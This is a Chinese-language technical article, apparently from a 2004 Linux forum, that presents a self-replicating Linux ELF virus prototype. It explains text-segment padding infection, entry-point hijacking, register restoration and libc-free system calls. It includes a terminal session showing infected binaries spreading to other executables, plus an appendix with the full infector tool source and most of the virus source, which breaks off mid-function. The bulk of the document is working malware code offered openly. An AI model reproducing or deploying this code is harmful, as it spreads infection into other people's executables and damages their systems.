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内容: 1 -- 介绍 2 -- ELF Infector (ELF文件感染器) 3 -- 病毒原型的工作过程 4 -- 关键技术问题及处理 5 -- 在一个新的编译环境下的调试方法 6 -- 最后 7 -- 参考文献 8 -- 附录 - ELF文件感染工具和病毒原型源代码 一、 ** 介绍 写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结, 同时向对这方面有兴趣的朋友做一个简单的介绍。 阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入 了汇编的C代码、了解病毒的基本工作原理。 二、 ** ELF Infector (ELF文件感染器) 为了制作病毒文件,我们需要一个ELF文件感染器,用于制造第一个带毒文件。 对于ELF文件感染技术,在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》 一文中已经有了一个非常好的分析、描述,在这方面我还没有发现可以对其进行补充的 地方,因此在这里我把Silvio Cesare对ELF Infection过程的总结贴出来,以供参考: The final algorithm is using this information is. * Increase p_shoff by PAGE_SIZE in the ELF header * Patch the insertion code (parasite) to jump to the entry point (original) * Locate the text segment program header * Modify the entry point of the ELF header to point to the new code (p_vaddr + p_filesz) * Increase p_filesz by account for the new code (parasite) * Increase p_memsz to account for the new code (parasite) * For each phdr who's segment is after the insertion (text segment) * increase p_offset by PAGE_SIZE * For the last shdr in the text segment * increase sh_len by the parasite length * For each shdr who's section resides after the insertion * Increase sh_offset by PAGE_SIZE * Physically insert the new code (parasite) and pad to PAGE_SIZE, into the file - text segment p_offset + p_filesz (original) 在Linux病毒原型中所使用的gei - ELF Infector即是根据这个原理写的。在 附录中你可以看到这个感染工具的源代码: g-elf-infector.c g-elf-infector与病毒是独立开的,其只在制作第一个病毒文件时被使用。我简单介 绍一下它的使用方法,g-elf-infector.c可以被用于任何希望--将二进制代码插入到 指定文件的文本段,并在目标文件执行时首先被执行--的用途上。g-elf-infector.c 的接口很简单,你只需要提供以下三个定义: * 存放你的二进制代码返回地址的地址,这里需要的是这个地址与代码起始 地址的偏移,用于返回到目标程序的正常入口 #define PARACODE_RETADDR_ADDR_OFFSET 1232 * 要插入的二进制代码(由于用C编写,所以这里需要以一个函数的方式提供) void parasite_code(void); * 二进制代码的结束(为了易用,这里用一个结尾函数来进行代码长度计算) void parasite_code_end(void); parasite_code_end应该是parasite_code函数后的第一个函数定义,通常应该如下表示 void parasite_code(void) { ... ... ... } void parasite_code_end(void) {} 在这里存在一个问题,就是编译有可能在编译时将parasite_code_end放在parasite_code 地址的前面,这样会导致计算代码长度时失败,为了避免这个问题,你可以这样做 void parasite_code(void) { ... ... ... } void parasite_code_end(void)  有了这三个定义,g-elf-infector就能正确编译,编译后即可用来ELF文件感染 ~grip2@linux> ./gei foo 三、** 病毒原型的工作过程 1 首先通过ELF Infector将病毒代码感染到一个ELF文件,这样就创造了第一 个带毒文件,后续的传播就由它来完成。 2 当带毒文件被执行时,会首先跳到病毒代码开始执行。 3 病毒代码开始发作,在这个原型里,病毒会直接开始传播。 4 病毒遍历当前目录下的每一个文件,如果是符合条件的ELF文件就开始感染。 5 病毒的感染过程和ELF Infector的过程类似,但由于工作环境的不同, 代码的实现也是有较大区别的。 6 目前传染对ELF文件的基本要求是文本段要有剩余空间能够容纳病毒代码, 如果无法满足,病毒会忽略此ELF。对于被感染过一次的ELF文件,文本段将不会有 剩余的空间,因此二次感染是不会发生的。 7 病毒代码执行过后,会恢复堆栈和所有寄存器(这很重要),然后跳回到 真正的可执行文件入口,开始正常的运行过程。 上面对病毒原型的工作过程的介绍也许显得千篇一律了,和我们早就熟知的 关于病毒的一些介绍没有什么区别?是的,的确是这样,原理都是类似的,关键是要看 实现。下面我们就将通过对一些技术问题的分析来了解具体的实现思路。 四、** 关键技术问题及处理 1 ELF文件执行流程重定向和代码插入 在ELF文件感染的问题上,ELF Infector与病毒传播时调用的infect_virus思路是一样的: * 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉 ELF文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变 所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部 分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要 注意文本段增加长度的对齐问题,见ELF文档中的描述: p_align As ``Program Loading'' later in this part describes, loadable process segments must have congruent values for p_vaddr and p_offset, modulo the page size. * 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向: /* Modify the entry point of the ELF */ org_entry = ehdr->e_entry; ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; 2 病毒代码如何返回到真正的ELF文件入口 方法技巧应该很多,这里采用的方法是PUSH+RET组合: __asm__ volatile ( ... "return:\n\t" "push $0xAABBCCDD\n\t" /* push ret_addr */ "ret\n" ::); 其中0xAABBCCDD处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程 序来填写。 3 堆栈和寄存器的恢复 病毒代码必须保证运行前、后的堆栈和寄存器内容完全相同,这通过增加额外的代码 来完成。 在进入时: __asm__ volatile ( "push %%eax\n\t" "push %%ecx\n\t" "push %%edx\n\t" ::); 退出时: __asm__ volatile ( "popl %%edx\n\t" "popl %%ecx\n\t" "popl %%eax\n\t" "addl $0x102c, %%esp\n\t" "popl %%ebx\n\t" "popl %%esi\n\t" "popl %%edi\n\t" "popl %%ebp\n\t" "jmp return\n" 要注意上面的代码是根据特定的编译器、编译选项来调整的,在不同的环境下如果重 新编译病毒程序,可能还需要做一些调整。 4 字符串的使用 write(1, "hello world\n", 12); 在病毒代码中这样对一个字符串直接引用是不可以的。这是对字符串的使用是一个绝 对地址引用,病毒代码在进入到一个新的宿主内后,这一绝对地址的内容是无法得到 保证的,因此在病毒代码内应该使用相对地址或间接地址进行字符串访问。 下面是Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》中的一个解决办法,利用 了缓冲区溢出中shellcode的编写技术: In x86 Linux, some syscalls require the use of an absolute address pointing to initialized data. This can be made relocatable by using a common trick used in buffer overflow code. jmp A B: pop %eax ; %eax now has the address of the string . ; continue as usual . . A: call B .string \"hello\" By making a call directly proceeding the string of interest, the address of the string is pushed onto the stack as the return address. 但是在编写这个linux病毒原型代码时,我并没有使用这个方法,我尽力使代码使用 C语言的语法: char tmpfile[32] = ; #ifndef NDEBUG char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ', 's','u','p','p','o','r','t','e','d','\n','\0'}; char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ', 'n','e','x','t',' ','f','i','l','e','\n','\0'}; #endif 在这里将字符串以字符数组的形式出现,编译之后的代码是这样: ... movb $47, -8312(%ebp) movb $116, -8311(%ebp) movb $109, -8310(%ebp) movb $112, -8309(%ebp) movb $47, -8308(%ebp) movb $46, -8307(%ebp) movb $103, -8306(%ebp) movb $118, -8305(%ebp) movb $105, -8304(%ebp) movb $114, -8303(%ebp) movb $117, -8302(%ebp) movb $115, -8301(%ebp) ... 这样带来一个负面影响就是增加了代码长度,但是适当的使用对代码长度影响并不大。 值得注意的一点是,当字符数组定义的尺寸超过了64时,在我的编译环境下,编译器 对代码进行了优化,会导致编译后代码成为: ... .section .rodata .LC0: .byte 47 .byte 116 .byte 109 .byte 112 .byte 47 .byte 46 .byte 103 .byte 118 .byte 105 .byte 114 .byte 117 .byte 115 .byte 0 ... 数据被放到了.rodata section中,这样就使得其无法随病毒代码一起进入宿主,会 造成访问失败,所以注意数组的申请尽量保持32以内,防止编译器优化。 除此之外,使用整型数组的方法也与此类似,不再赘述。 5 遭遇gcc-3.3的bug gvirus.c中有一部分的数据初始化是这样的: ... char curdir[2] = {'.', 0}; char newline = '\n'; curdir[0] = '.'; curdir[1] = 0; newline = '\n'; if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0) goto out; ... 也许你会奇怪,为什么curdir和newline在已经初始化后还要重新赋值,这其中的原因 是为了绕过一个gcc的bug。 在我的编译环境下,当只做 char curdir[2] = {'.', 0}; char newline = '\n'; 这样的初始化时,反汇编代码如下: ... 0x08048cb0 : push %ebp 0x08048cb1 : push %edi 0x08048cb2 : push %esi 0x08048cb3 : push %ebx 0x08048cb4 : sub $0x20bc,%esp 0x08048cba : push %eax 0x08048cbb : push %ecx 0x08048cbc : push %edx 0x08048cbd : xor %ecx,%ecx 0x08048cbf : lea 0x4e(%esp),%ebx <-- 使用curdir 0x08048cc3 : mov $0x5,%eax 0x08048cc8 : mov %ecx,%edx 0x08048cca : int $0x80 <-- g_open系统调用 0x08048ccc : mov %eax,0x38(%esp) 0x08048cd0 : cmp $0xffffff82,%eax 0x08048cd3 : jbe 0x8048cdd  0x08048cd5 : movl $0xffffffff,0x38(%esp) 0x08048cdd : mov 0x38(%esp),%eax 0x08048ce1 : test %eax,%eax 0x08048ce3 : js 0x804915d  0x08048ce9 : movw $0x2e,0x4e(%esp) <-- curdir的初始化 ... 从注释可以看出,在这种情况下,curdir的初始化被放到了g_open使用其做参数之后。 当加入 curdir[0] = '.'; curdir[1] = 0; newline = '\n'; 后,反汇编代码如下: ... 0x08048cb0 : push %ebp 0x08048cb1 : push %edi 0x08048cb2 : push %esi 0x08048cb3 : push %ebx 0x08048cb4 : sub $0x20bc,%esp 0x08048cba : push %eax 0x08048cbb : push %ecx 0x08048cbc : push %edx 0x08048cbd : xor %ecx,%ecx 0x08048cbf : movw $0x2e,0x4e(%esp) <-- curdir的初始化 0x08048cc6 : lea 0x4e(%esp),%ebx <-- 作为参数使用 0x08048cca : mov $0x5,%eax 0x08048ccf : mov %ecx,%edx 0x08048cd1 : int $0x80 <-- g_open系统调用 ... 从注释可以看出,加入了这段代码后,程序编译正确,避免了这个编译器bug。 6 通过C语言和inline保证病毒代码的可读性和可移植性 用汇编写病毒代码的一个缺点就是 - 可读性和可移植性差,这也是使用汇编语言写 程序的一个普遍的缺点。 在这个linux病毒原型代码了主体使用的都是C语言,只有极少部分由于C语言本身的 限制而不得不使用gcc嵌入汇编。对于C语言部分,也尽量是用inline函数,保证代码 层次分明,保证可读性。 7 病毒代码复制时如何获得自己的起始地址? 虽然,病毒代码部分向ELF Infector提供了代码的起始地址,保证了生成第一个带毒 文件时能够找到代码并插入到目标文件内。但是作为进入宿主内部的代码在进行传播 时却无法使用这个地址,因为它的代码位置已经受到了宿主的影响,这时它需要重新 定位自己的起始位置。 在写这个病毒原型时,我并没有参考过其它病毒的代码,因此这里采用的也许并 不是一个最好的方法: /* Get start address of virus code */ __asm__ volatile ( "jmp get_start_addr\n" "infect_start:\n\t" "popl %0\n\t" :"=m" (para_code_start_addr) :); para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1; ... /* c代码 */ ... __asm__ volatile ( ... "get_start_addr:\n\t" "call infect_start\n" "return:\n\t" "push $0xAABBCCDD\n\t" /* push ret_addr */ "ret\n" ::); 通过缓冲区溢出中的一个技巧,jmp/call组合来得到push $0xAABBCCDD指令的地址。 这个地址是0xAABBCCDD地址向后一个push指令,而0xAABBCCDD的地址就是那个用于 存放病毒代码返回地址的地址,这个地址相对于病毒代码起始地址的偏移我们是知道 的,就是病毒代码函数向ELF Infector接口提供的那个宏定义的值: #ifndef NDEBUG #define PARACODE_RETADDR_ADDR_OFFSET 1704 #else #define PARACODE_RETADDR_ADDR_OFFSET 1232 #endif 这样病毒代码在当前宿主中的位置就可以得到了(注意从汇编指令出来后, para_code_start_addr中存放的是0xAABBCCDD的地址,我们减去偏移再减 一个push指令的长度,就是病毒代码的起始地址): para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1; 8 抛弃C库 由于病毒代码要能在不同的ELF文件内容工作,所以我们必须要保证所有的相关函数 调用在病毒体内即可完成。而对C库的使用将使我们很难做到这一点,即使有的C库函 数是可以完全内联的(完全内联就是说,这个函数本身可以内联,同时其内部没有向 外的函数调用),但是随着编译环境的不同,这点也是不能得到根本保证的,因此我 们有必要选择抛弃C库。 没有了C库,我们使用到的一些函数调用就必须重新实现。在这个Linux病毒原型中有 两种情况,一种是系统调用,另一种是普通的函数。 对于系统调用,我们采用了重新包装的方法: static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count); static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count); static inline g_syscall3(int, open, const char *, file, int, flag, int, mode); static inline g_syscall1(int, close, int, fd); static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot, int, flags, int, fd, off_t, offset); static inline g_syscall2(int, munmap, void *, addr, size_t, len); static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath); static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf); 并且修改了syscall包装的宏定义,如 #define g__syscall_return(type, res) \ do { \ if ((unsigned long)(res) >= (unsigned long)(-125)) { \ res = -1; \ } \ return (type) (res); \ } while (0) #define g_syscall0(type,name) \ type g_##name(void) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name)); \ g__syscall_return(type,__res); \ } 对于普通的函数,直接复制一份函数定义: static inline void * __memcpy(void * to, const void * from, size_t n) { int d0, d1, d2; __asm__ __volatile__( "rep ; movsl\n\t" "testb $2,%b4\n\t" "je 1f\n\t" "movsw\n" "1:\ttestb $1,%b4\n\t" "je 2f\n\t" "movsb\n" "2:" : "=&c" (d0), "=&D" (d1), "=&S" (d2) :"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from) : "memory"); return (to); } 9 保证病毒代码的瘦身需要 为了保证病毒代码体积不至于过于庞大,影响病毒代码的感染,编写代码时也要注意 代码体积问题。由于采用C代码的方式,一些函数调用都是内联的方式,因此每多一个 调用都会引起代码体积的增加。 在进行ELF文件读写更是如此,read/write被频繁的调用。为了减小这方面的影响,对 目标ELF文件进行了一个mmap处理,这样地址空间直接被映射到文件,就消除了读目标 文件时所要做的read调用,节省了一些空间: ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); if (ehdr == MAP_FAILED) { goto err; } /* Check ELF magic-ident */ if (ehdr->e_ident[EI_MAG0] != 0x7f || ehdr->e_ident[EI_MAG1] != 'E' || ehdr->e_ident[EI_MAG2] != 'L' || ehdr->e_ident[EI_MAG3] != 'F' || ehdr->e_ident[EI_CLASS] != ELFCLASS32 || ehdr->e_ident[EI_DATA] != ELFDATA2LSB || ehdr->e_ident[EI_VERSION] != EV_CURRENT || ehdr->e_type != ET_EXEC || ehdr->e_machine != EM_386 || ehdr->e_version != EV_CURRENT ) { V_DEBUG_WRITE(1, &err_type, sizeof(err_type)); goto err; } 当前的代码都是用C编写,这样很难象汇编代码那样进行更高程度的精简,不过目前的 代码体积还在合理的范围, 在调试状态和标准状态分别是1744和1248 #ifndef NDEBUG #define PARACODE_LENGTH 1744 #else #define PARACODE_LENGTH 1248 #endif 10 数据结构的不一致 与C库的代码调用类似,我们使用的头文件中有一些数据类型的定义是经过 包装的,与系统调用中使用的并不相同。代码相关的两个数据结构,单独提取了出来。 struct dirent { long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[256]; /* We must not include limits.h! */ }; struct stat { unsigned long st_dev; unsigned long st_ino; unsigned short st_mode; unsigned short st_nlink; unsigned short st_uid; unsigned short st_gid; unsigned long st_rdev; unsigned long st_size; unsigned long st_blksize; unsigned long st_blocks; unsigned long st_atime; unsigned long st_atime_nsec; unsigned long st_mtime; unsigned long st_mtime_nsec; unsigned long st_ctime; unsigned long st_ctime_nsec; unsigned long __unused4; unsigned long __unused5; }; 五、** 在一个新的编译环境下的调试方法 grip2@linux:~/tmp/virus> ls g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c Makefile parasite-sample.c parasite-sample.h 调整Makefile文件,将编译模式改为调试模式,即关掉-DNDEBUG选项 grip2@linux:~/tmp/virus> cat Makefile all: foo gei gei: g-elf-infector.c gvirus.o gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG foo: foo.c gcc $< -o foo gvirus.o: gvirus.c gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG clean: rm *.o -rf rm foo -rf rm gei -rf 编译代码 grip2@linux:~/tmp/virus> make gcc foo.c -o foo gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG 先获取病毒代码长度,然后调整gvirus.c中的#define PARACODE_LENGTH定义 grip2@linux:~/tmp/virus> ./gei -l <-- 这里获取病毒代码的长度 Parasite code length: 1744 获取病毒代码开始位置和0xaabbccdd的地址,计算存放返回地址的地址的偏移 grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd 8049427: 68 dd cc bb aa push $0xaabbccdd grip2@linux:~/tmp/virus> objdump -d gei|grep "" 08048d80 : 8049450: e9 2b f9 ff ff jmp 8048d80  grip2@linux:~/tmp/virus> objdump -d gei|grep ":" 08048d80 : 0x8049427与0x8048d80相减即获得我们需要的偏移, 用这个值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值 重新编译 grip2@linux:~/tmp/virus> make clean rm *.o -rf rm foo -rf rm gei -rf grip2@linux:~/tmp/virus> make gcc foo.c -o foo gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG grip2@linux:~/tmp/virus> ls gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h 建立一个测试目录,测试一下 grip2@linux:~/tmp/virus> mkdir test grip2@linux:~/tmp/virus> cp gei foo test grip2@linux:~/tmp/virus> cd test grip2@linux:~/tmp/virus/test> ls gei foo grip2@linux:~/tmp/virus/test> cp foo h 制作带毒程序 grip2@linux:~/tmp/virus/test> ./gei h file size: 8668 e_phoff: 00000034 e_shoff: 00001134 e_phentsize: 00000020 e_phnum: 00000008 e_shentsize: 00000028 e_shnum: 00000025 text segment file offset: 0 [15 sections patched] grip2@linux:~/tmp/virus/test> ll total 44 -rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo 运行带毒程序 grip2@linux:~/tmp/virus/test> ./h . .. gei foo h .backup.h real elf point grip2@linux:~/tmp/virus/test> ll total 52 -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo 测试上面带毒程序运行后,是否感染了其他ELF程序 grip2@linux:~/tmp/virus/test> ./foo . .. gei Better luck next file foo h Better luck next file .backup.h Better luck next file real elf point OK,成功 grip2@linux:~/tmp/virus/test> cp ../foo hh grip2@linux:~/tmp/virus/test> ll total 64 -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo grip2@linux:~/tmp/virus/test> ./foo . .. gei Better luck next file foo h Better luck next file .backup.h Better luck next file hh real elf point grip2@linux:~/tmp/virus/test> 六、** 最后 由于我既不是一个virus coder也不是一个anti-virus coder,所以对病毒 技术的掌握应该是有欠缺的。如果在文章中对病毒技术的描述不够准确,分析不够到 位,还请指正,谢谢。 七、** 参考文献 1 Silvio Cesare 的《UNIX ELF PARASITES AND VIRUS》 2 ELF文档 3 更多的安全技术交流 http://www.linuxforum.net/forum/showflat.php?Cat=&Board=security& Number=479955&page=0&view=collapsed&sb=5&o=31&fpart= 八、** 附录 - ELF文件感染工具和病毒原型源代码 ------------------------------ g-elf_infector.c ------------------------------ /* * gei - ELF Infector v0.0.2 (2004) * written by grip2  */ #include  #include  #include  #include  #include  #include  #include  #include  #include "gvirus.h" #define PAGE_SIZE 4096 #define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)) static int elf_infect(const char *filename, void *para_code, unsigned int para_code_size, unsigned long retaddr_addr_offset); int main(int argc, char *argv[]) { #define MAX_FILENAME_LEN 256 char backup[MAX_FILENAME_LEN*4]; char restore[MAX_FILENAME_LEN*4]; if (argc != 2) { fprintf(stderr, "gei - ELF Infector v0.0.2 written by grip2 \n"); fprintf(stderr, "Usage: %s \n", argv[0]); return 1; } if (strcmp(argv[1], "-l") == 0) { fprintf(stderr, "Parasite code length: %d\n", ¶site_code_end - ¶site_code); return 1; } if (strlen(argv[1]) > MAX_FILENAME_LEN) { fprintf(stderr, "filename too long!\n"); return 1; } sprintf(backup, "cp -f %s .backup.%s\n", argv[1], argv[1]); sprintf(restore, "cp -f .backup.%s %s\n", argv[1], argv[1]); system(backup); if (elf_infect(argv[1], ¶site_code, ¶site_code_end - ¶site_code, PARACODE_RETADDR_ADDR_OFFSET) < 0) { system(restore); return 1; } return 0; } static int elf_infect(const char *filename, void *para_code, unsigned int para_code_size, unsigned long retaddr_addr_offset) { int fd = -1; int tmp_fd = -1; Elf32_Ehdr *ehdr = NULL; Elf32_Phdr *phdr; Elf32_Shdr *shdr; int i; int txt_index; struct stat stat; int align_code_size; unsigned long org_entry; void *new_code_pos; int tmp_flag; int size; unsigned char tmp_para_code[PAGE_SIZE]; char *tmpfile; tmpfile = tempnam(NULL, "infector"); fd = open(filename, O_RDWR); if (fd == -1) { perror(filename); goto err; } if (fstat(fd, &stat) == -1) { perror("fstat"); goto err; } #ifndef NDEBUG printf("file size: %lu\n", stat.st_size); #endif ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); if (ehdr == MAP_FAILED) { perror("mmap ehdr"); goto err; } /* Check ELF magic-ident */ if (ehdr->e_ident[EI_MAG0] != 0x7f || ehdr->e_ident[EI_MAG1] != 'E' || ehdr->e_ident[EI_MAG2] != 'L' || ehdr->e_ident[EI_MAG3] != 'F' || ehdr->e_ident[EI_CLASS] != ELFCLASS32 || ehdr->e_ident[EI_DATA] != ELFDATA2LSB || ehdr->e_ident[EI_VERSION] != EV_CURRENT || ehdr->e_type != ET_EXEC || ehdr->e_machine != EM_386 || ehdr->e_version != EV_CURRENT ) { fprintf(stderr, "File type not supported\n"); goto err; } #ifndef NDEBUG printf("e_phoff: %08x\ne_shoff: %08x\n", ehdr->e_phoff, ehdr->e_shoff); printf("e_phentsize: %08x\n", ehdr->e_phentsize); printf("e_phnum: %08x\n", ehdr->e_phnum); printf("e_shentsize: %08x\n", ehdr->e_shentsize); printf("e_shnum: %08x\n", ehdr->e_shnum); #endif align_code_size = PAGE_ALIGN(para_code_size); /* Get program header and section header start address */ phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff); shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff); /* Locate the text segment */ txt_index = 0; while (1) { if (txt_index == ehdr->e_phnum - 1) { fprintf(stderr, "Invalid e_phnum, text segment not found.\n"); goto err; } if (phdr[txt_index].p_type == PT_LOAD && phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */ #ifndef NDEBUG printf("text segment file offset: %u\n", phdr[txt_index].p_offset); #endif if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size > phdr[txt_index+1].p_vaddr) { fprintf(stderr, "Better luck next file :-)\n"); goto err; } break; } txt_index++; } /* Modify the entry point of the ELF */ org_entry = ehdr->e_entry; ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; new_code_pos = (void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz; /* Increase the p_filesz and p_memsz of text segment * for new code */ phdr[txt_index].p_filesz += align_code_size; phdr[txt_index].p_memsz += align_code_size; for (i = 0; i < ehdr->e_phnum; i++) if (phdr.p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) phdr.p_offset += align_code_size; tmp_flag = 0; for (i = 0; i < ehdr->e_shnum; i++) { if (shdr.sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) { shdr.sh_offset += align_code_size; if (!tmp_flag && i) { /* associating the new_code to the last * section in the text segment */ shdr[i-1].sh_size += align_code_size; tmp_flag = 1; printf("[%d sections patched]\n", i-1); } } } /* Increase p_shoff in the ELF header */ ehdr->e_shoff += align_code_size; /* Make a new file */ tmp_fd = open(tmpfile, O_WRONLY|O_CREAT, stat.st_mode); if (tmp_fd == -1) { perror("open"); goto err; } size = new_code_pos - (void *) ehdr; if (write(tmp_fd, ehdr, size) != size) { perror("write"); goto err; } memcpy(tmp_para_code, para_code, para_code_size); memcpy(tmp_para_code + retaddr_addr_offset, &org_entry, sizeof(org_entry)); if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) { perror("write"); goto err; } if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size) != stat.st_size - size) { perror("write"); goto err; } close(tmp_fd); munmap(ehdr, stat.st_size); close(fd); if (rename(tmpfile, filename) == -1) { perror("rename"); goto err; } return 0; err: if (tmp_fd != -1) close(tmp_fd); if (ehdr) munmap(ehdr, stat.st_size); if (fd != -1) close(fd); return -1; } ------------------------------ g-elf_infector.c ------------------------------ ------------------------------ gvirus.h ------------------------------ #ifndef _G2_PARASITE_CODE_ #define _G2_PARASITE_CODE_ #ifndef NDEBUG #define PARACODE_RETADDR_ADDR_OFFSET 1704 #else #define PARACODE_RETADDR_ADDR_OFFSET 1232 #endif void parasite_code(void); void parasite_code_end(void); #endif ------------------------------ gvirus.h ------------------------------ ------------------------------ gvirus.c ------------------------------ /* * virus code in C (2004) * written by grip2  */ #include "gsyscall.h" #include "gvirus.h" #include  #define PAGE_SIZE 4096 #define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)) #ifndef NDEBUG #define PARACODE_LENGTH 1744 #else #define PARACODE_LENGTH 1248 #endif #ifndef NDEBUG #define V_DEBUG_WRITE(...) \ do {\ g_write(__VA_ARGS__);\ } while(0) #else #define V_DEBUG_WRITE(...) #endif static inline int infect_virus( const char *file, void *v_code, unsigned int v_code_size, unsigned long v_retaddr_addr_offset) { int fd = -1; int tmp_fd = -1; Elf32_Ehdr *ehdr = NULL; Elf32_Phdr *phdr; Elf32_Shdr *shdr; int i; int txt_index; struct stat stat; int align_code_size; unsigned long org_entry; void *new_code_pos; int tmp_flag; int size; unsigned char tmp_v_code[PAGE_SIZE]; char tmpfile[32] = ; #ifndef NDEBUG char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ', 's','u','p','p','o','r','t','e','d','\n','\0'}; char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ', 'n','e','x','t',' ','f','i','l','e','\n','\0'}; #endif fd = g_open(file, O_RDWR, 0); if (fd == -1) { goto err; } if (g_fstat(fd, &stat) == -1) { goto err; } ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); if (ehdr == MAP_FAILED) { goto err; } /* Check ELF magic-ident */ if (ehdr->e_ident[EI_MAG0] != 0x7f || ehdr->e_ident[EI_MAG1] != 'E' || ehdr->e_ident[EI_MAG2] != 'L' || ehdr->e_ident[EI_MAG3] != 'F' || ehdr->e_ident[EI_CLASS] != ELFCLASS32 || ehdr->e_ident[EI_DATA] != ELFDATA2LSB || ehdr->e_ident[EI_VERSION] != EV_CURRENT || ehdr->e_type != ET_EXEC || ehdr->e_machine != EM_386 || ehdr->e_version != EV_CURRENT ) { V_DEBUG_WRITE(1, &err_type, sizeof(err_type)); goto err; } align_code_size = PAGE_ALIGN(v_code_size); /* Get program header and section header start address */ phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff); shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff); /* Locate the text segment */ txt_index = 0; while (1) { if (txt_index == ehdr->e_phnum - 1) goto err; if (phdr[txt_index].p_type == PT_LOAD && phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */ if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size > phdr[txt_index+1].p_vaddr) { V_DEBUG_WRITE(1, &luck, sizeof(luck)); goto err; } break; } txt_index++; } /* Modify the entry point of the ELF */ org_entry = ehdr->e_entry; ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; new_code_pos = (void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz; /* Increase the p_filesz and p_memsz of text segment * for new code */ phdr[txt_index].p_filesz += align_code_size; phdr[txt_index].p_memsz += align_code_size; for (i = 0; i < ehdr->e_phnum; i++) if (phdr.p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) phdr.p_offset += align_code_size; tmp_flag = 0; for (i = 0; i < ehdr->e_shnum; i++) { if (shdr.sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) { shdr.sh_offset += align_code_size; if (!tmp_flag && i) { /* associating the new_code to the last * section in the text segment */ shdr[i-1].sh_size += align_code_size; tmp_flag = 1; } } } /* Increase p_shoff in the ELF header */ ehdr->e_shoff += align_code_size; /* Make a new file */ tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode); if (tmp_fd == -1) { goto err; } size = new_code_pos - (void *) ehdr; if (g_write(tmp_fd, ehdr, size) != size) goto err; __memcpy(tmp_v_code, v_code, v_code_size); __memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry)); if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) { goto err; } if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size) != stat.st_size - size) { goto err; } g_close(tmp_fd); g_munmap(ehdr, 